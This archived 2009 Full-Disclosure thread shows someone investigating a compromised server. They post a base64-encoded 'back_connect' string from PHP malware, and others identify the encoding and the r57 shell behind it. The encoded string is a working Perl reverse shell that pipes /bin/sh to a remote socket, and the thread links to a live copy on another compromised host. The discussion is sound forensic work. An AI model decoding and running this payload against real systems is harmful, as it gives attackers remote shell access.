| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 10 Feb 2009 22:01:34 -0500 From: Justin Rogosky <jrogosky@...il.com> To: "sr." <staticrez@...il.com> Cc: Full-Disclosure <full-disclosure@...ts.grok.org.uk>, pen-test list <pen-test@...urityfocus.com> Subject: Re: connect back PHP hack Just as an FYI: Webscarab and Paros (web application proxies) both have a good Base64 decoder built-in. This is useful for any sniffed requested using basic authentication as well. --Justin On Tue, 2009-02-10 at 14:34 -0500, sr. wrote: > i really appreciate all of the responses. this is what community is all about. > > i'd seen the "==" in other encoding schemes, but just wasn't sure and > wanted a quick response...thanks to everyone who responded! > > I'll post the rest of my findings on here asap. i'm looking into an > old compromised machine. this is nothing new.. > > whoever mentioned the r57 shell, you're probably right as the script > connects to a remote box @ port 11457. this is r57 behaviour. > > i also found a copy of the same script i'm dissecting on someone > else's box, you can check it out here: > http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php > > in my case, a bunch of php files were modified. i'll zip everything up > and host it so you can all analyze... > > thx, > > sr. aka "fabrizio siciliano" > > > > > > On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro <gcastrop@...il.com> wrote: > > "Sr." > > > > This is base64 encoded. > > > > 2009/2/10 sr. <staticrez@...il.com>: > >> can anyone tell me what encoding this is? > >> > >> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > >> > >> this has to do with old php 4.x.x version with magic quotes enabled. > >> i'm just trying to figure out what the connect back code does. > >> > >> any input is much appreciated. > >> > >> thx, > >> > >> sr. > > > > -- > > Saludos, > > Gustavo Castro Puig. > > E-Mail: gcastrop@...il.com > > > > LPI Level-1 Certified (https://www.lpi.org/es/verify.html > > LPID:LPI000042304 Verification Code: hp6re8w5qg ) > > -----BEGIN GEEK CODE BLOCK----- > > Version: 3.12 > > GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o? > > K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++ > > D++ G++ e++ h--- r y+++ > > ------END GEEK CODE BLOCK------ > > Registered Linux User #69342 > > > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists